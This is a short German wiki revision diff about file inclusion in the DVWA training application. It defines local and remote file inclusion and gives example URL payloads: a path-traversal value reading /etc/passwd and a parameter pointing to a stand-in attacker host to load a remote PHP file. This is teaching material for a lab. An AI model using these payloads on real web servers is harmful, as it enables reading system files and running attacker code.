DVWA File Inclusion: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 9: | Zeile 9: | ||
=Remote File Inclusion= | =Remote File Inclusion= | ||
*Download und Ausführen einer Datei von extern. | *Download und Ausführen einer Datei von extern. | ||
| + | *z.Bsp. Anpassen der URL: ...?page=http://www.evilsite.com/evil.php | ||
Version vom 15. Juni 2021, 13:36 Uhr
- Tritt auf, wenn der Client die Möglichkeit hat, Dateien mitzugeben, die der Server einbindet.
Local File Inclusion
- Ausführen einer Datei, die lokal auf dem Server vorliegt.
- z.Bsp. Anpassen der URL: ...?page=../../../../../../etc/passwd
Remote File Inclusion
- Download und Ausführen einer Datei von extern.
- z.Bsp. Anpassen der URL: ...?page=http://www.evilsite.com/evil.php